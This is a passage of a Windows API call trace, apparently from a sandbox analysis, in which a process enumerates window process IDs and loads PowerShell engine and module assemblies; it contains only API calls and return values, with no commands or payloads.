lpdwProcessId=0x19e650) returned 0x810 [0046.875] GetLastError () returned 0x0 [0046.875] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x20c [0046.876] GetLastError () returned 0x0 [0046.876] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x5d8 [0046.876] GetLastError () returned 0x0 [0046.876] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4fc [0046.876] GetLastError () returned 0x0 [0046.876] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4e4 [0046.876] GetLastError () returned 0x0 [0046.876] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x7a0 [0046.876] GetLastError () returned 0x0 [0046.876] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x7c8 [0046.876] GetLastError () returned 0x0 [0046.876] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x208 [0046.876] GetLastError () returned 0x0 [0046.876] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x540 [0046.876] GetLastError () returned 0x0 [0046.876] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x78c [0046.876] GetLastError () returned 0x0 [0046.876] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x670 [0046.876] GetLastError () returned 0x0 [0046.876] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x620 [0046.877] GetLastError () returned 0x0 [0046.877] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x738 [0046.877] GetLastError () returned 0x0 [0046.877] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x700 [0046.877] GetLastError () returned 0x0 [0046.877] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x248 [0046.877] GetLastError () returned 0x0 [0046.877] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x570 [0046.877] GetLastError () returned 0x0 [0046.877] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x7f4 [0046.877] GetLastError () returned 0x0 [0046.878] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x644 [0046.878] GetLastError () returned 0x0 [0046.878] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x54c [0046.878] GetLastError () returned 0x0 [0046.878] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x634 [0046.878] GetLastError () returned 0x0 [0046.878] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x5cc [0046.878] GetLastError () returned 0x0 [0046.878] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x418 [0046.878] GetLastError () returned 0x0 [0046.878] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x7a4 [0046.878] GetLastError () returned 0x0 [0046.878] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x484 [0046.878] GetLastError () returned 0x0 [0046.878] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x5d4 [0046.878] GetLastError () returned 0x0 [0046.878] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x5dc [0046.878] GetLastError () returned 0x0 [0046.878] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x7d0 [0046.878] GetLastError () returned 0x0 [0046.879] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x240 [0046.879] GetLastError () returned 0x0 [0046.879] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x560 [0046.879] GetLastError () returned 0x0 [0046.879] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x564 [0046.879] GetLastError () returned 0x0 [0046.879] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x7a8 [0046.879] GetLastError () returned 0x0 [0046.879] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x434 [0046.879] GetLastError () returned 0x0 [0046.879] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x71c [0046.879] GetLastError () returned 0x0 [0046.879] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x67c [0046.879] GetLastError () returned 0x0 [0046.879] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x50c [0046.879] GetLastError () returned 0x0 [0046.879] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x514 [0046.879] GetLastError () returned 0x0 [0046.879] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4f0 [0046.879] GetLastError () returned 0x0 [0046.880] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x58c [0046.880] GetLastError () returned 0x0 [0046.880] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x458 [0046.880] GetLastError () returned 0x0 [0046.880] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x4f4 [0046.880] GetLastError () returned 0x0 [0046.880] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x794 [0046.880] GetLastError () returned 0x0 [0046.880] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x458 [0046.880] GetLastError () returned 0x0 [0046.880] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x19e650 | out: lpdwProcessId=0x19e650) returned 0x778 [0046.880] GetLastError () returned 0x0 [0046.880] GetLastError () returned 0x0 [0046.883] WerSetFlags () returned 0x0 [0046.897] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0046.898] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x19ea2c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x19ea28 | out: pulNumLanguages=0x19ea2c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x19ea28) returned 1 [0046.898] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x19ea2c, pwszLanguagesBuffer=0x2ab3768, pcchLanguagesBuffer=0x19ea28 | out: pulNumLanguages=0x19ea2c, pwszLanguagesBuffer=0x2ab3768, pcchLanguagesBuffer=0x19ea28) returned 1 [0046.907] GetUserDefaultLocaleName (in: lpLocaleName=0x247300, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0046.931] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.931] GetLastError () returned 0xcb [0046.935] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.935] GetLastError () returned 0xcb [0046.936] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.937] GetLastError () returned 0xcb [0046.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e49c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0046.947] GetLastError () returned 0xcb [0046.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e4b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0046.947] GetLastError () returned 0xcb [0046.947] SetErrorMode (uMode=0x1) returned 0x1 [0046.947] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x19e938 | out: lpFileInformation=0x19e938*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0046.947] GetLastError () returned 0xcb [0046.947] SetErrorMode (uMode=0x1) returned 0x1 [0046.947] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x19e9bc | out: lpdwHandle=0x19e9bc) returned 0x94c [0046.948] GetLastError () returned 0x0 [0046.948] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ab5c98 | out: lpData=0x2ab5c98) returned 1 [0046.949] VerQueryValueW (in: pBlock=0x2ab5c98, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x19e988, puLen=0x19e984 | out: lplpBuffer=0x19e988*=0x2ab5d34, puLen=0x19e984) returned 1 [0046.949] VerQueryValueW (in: pBlock=0x2ab5c98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x19e904, puLen=0x19e900 | out: lplpBuffer=0x19e904*=0x2ab5e10, puLen=0x19e900) returned 1 [0046.949] lstrlenW (lpString="Microsoft Corporation") returned 21 [0046.949] lstrcpyW (in: lpString1=0x247300, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0046.949] VerQueryValueW (in: pBlock=0x2ab5c98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x19e904, puLen=0x19e900 | out: lplpBuffer=0x19e904*=0x2ab5e64, puLen=0x19e900) returned 1 [0046.949] lstrlenW (lpString="System.Management.Automation") returned 28 [0046.949] lstrcpyW (in: lpString1=0x247300, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0046.949] VerQueryValueW (in: pBlock=0x2ab5c98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x19e904, puLen=0x19e900 | out: lplpBuffer=0x19e904*=0x2ab5ec0, puLen=0x19e900) returned 1 [0046.949] lstrlenW (lpString="6.1.7601.17514") returned 14 [0046.949] lstrcpyW (in: lpString1=0x247300, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0046.950] VerQueryValueW (in: pBlock=0x2ab5c98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x19e904, puLen=0x19e900 | out: lplpBuffer=0x19e904*=0x2ab5f00, puLen=0x19e900) returned 1 [0046.950] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0046.950] lstrcpyW (in: lpString1=0x247300, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0046.950] VerQueryValueW (in: pBlock=0x2ab5c98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x19e904, puLen=0x19e900 | out: lplpBuffer=0x19e904*=0x2ab5f68, puLen=0x19e900) returned 1 [0046.950] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0046.950] lstrcpyW (in: lpString1=0x247300, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0046.950] VerQueryValueW (in: pBlock=0x2ab5c98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x19e904, puLen=0x19e900 | out: lplpBuffer=0x19e904*=0x2ab6004, puLen=0x19e900) returned 1 [0046.950] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0046.950] lstrcpyW (in: lpString1=0x247300, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0046.950] VerQueryValueW (in: pBlock=0x2ab5c98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x19e904, puLen=0x19e900 | out: lplpBuffer=0x19e904*=0x2ab6068, puLen=0x19e900) returned 1 [0046.950] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0046.950] lstrcpyW (in: lpString1=0x247300, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0046.950] VerQueryValueW (in: pBlock=0x2ab5c98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x19e904, puLen=0x19e900 | out: lplpBuffer=0x19e904*=0x2ab60e4, puLen=0x19e900) returned 1 [0046.950] lstrlenW (lpString="6.1.7601.17514") returned 14 [0046.950] lstrcpyW (in: lpString1=0x247300, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0046.950] VerQueryValueW (in: pBlock=0x2ab5c98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x19e904, puLen=0x19e900 | out: lplpBuffer=0x19e904*=0x2ab5d8c, puLen=0x19e900) returned 1 [0046.950] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0046.950] lstrcpyW (in: lpString1=0x247300, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0046.950] VerQueryValueW (in: pBlock=0x2ab5c98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x19e904, puLen=0x19e900 | out: lplpBuffer=0x19e904*=0x0, puLen=0x19e900) returned 0 [0046.950] VerQueryValueW (in: pBlock=0x2ab5c98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x19e904, puLen=0x19e900 | out: lplpBuffer=0x19e904*=0x0, puLen=0x19e900) returned 0 [0046.951] VerQueryValueW (in: pBlock=0x2ab5c98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x19e904, puLen=0x19e900 | out: lplpBuffer=0x19e904*=0x0, puLen=0x19e900) returned 0 [0046.951] VerQueryValueW (in: pBlock=0x2ab5c98, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x19e8f8, puLen=0x19e8f4 | out: lplpBuffer=0x19e8f8*=0x2ab5d34, puLen=0x19e8f4) returned 1 [0046.951] VerLanguageNameW (in: wLang=0x0, szLang=0x247300, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0046.951] VerQueryValueW (in: pBlock=0x2ab5c98, lpSubBlock="\\", lplpBuffer=0x19e90c, puLen=0x19e908 | out: lplpBuffer=0x19e90c*=0x2ab5cc0, puLen=0x19e908) returned 1 [0046.957] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.957] GetLastError () returned 0xcb [0046.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0046.970] GetLastError () returned 0xcb [0046.974] lstrlenW (lpString="䅁") returned 1 [0046.977] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e8d0 | out: phkResult=0x19e8d0*=0x328) returned 0x0 [0046.977] RegOpenKeyExW (in: hKey=0x328, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e8d4 | out: phkResult=0x19e8d4*=0x32c) returned 0x0 [0046.977] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e908 | out: phkResult=0x19e908*=0x330) returned 0x0 [0046.979] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e948, lpData=0x0, lpcbData=0x19e944*=0x0 | out: lpType=0x19e948*=0x1, lpData=0x0, lpcbData=0x19e944*=0x56) returned 0x0 [0046.980] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e948, lpData=0x247300, lpcbData=0x19e944*=0x56 | out: lpType=0x19e948*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x19e944*=0x56) returned 0x0 [0046.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0046.984] GetLastError () returned 0x0 [0046.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0046.985] GetLastError () returned 0x0 [0046.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0046.992] GetLastError () returned 0x0 [0047.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.007] GetLastError () returned 0xcb [0047.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x19e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0047.246] GetLastError () returned 0x2 [0047.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x19e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0047.246] GetLastError () returned 0x2 [0047.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.336] GetLastError () returned 0xcb [0047.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.337] GetLastError () returned 0xcb [0047.364] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.364] GetLastError () returned 0xcb [0047.365] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.365] GetLastError () returned 0xcb [0047.365] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.365] GetLastError () returned 0xcb [0047.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x19e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0047.508] GetLastError () returned 0x0 [0047.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x19e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0047.508] GetLastError () returned 0x0 [0047.530] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.530] GetLastError () returned 0xcb [0047.532] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.532] GetLastError () returned 0xcb [0047.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0047.582] GetLastError () returned 0x7e [0047.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0047.582] GetLastError () returned 0x7e [0048.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x19e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0048.060] GetLastError () returned 0x2 [0048.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x19e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0048.060] GetLastError () returned 0x2 [0048.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.116] GetLastError () returned 0x57 [0048.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0048.116] GetLastError () returned 0x57 [0048.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x19e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0048.241] GetLastError () returned 0x2 [0048.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x19e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0048.242] GetLastError () returned 0x2 [0048.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x19e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0048.374] GetLastError () returned 0x2 [0048.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x19e410, lpFilePart=0x0 | out: 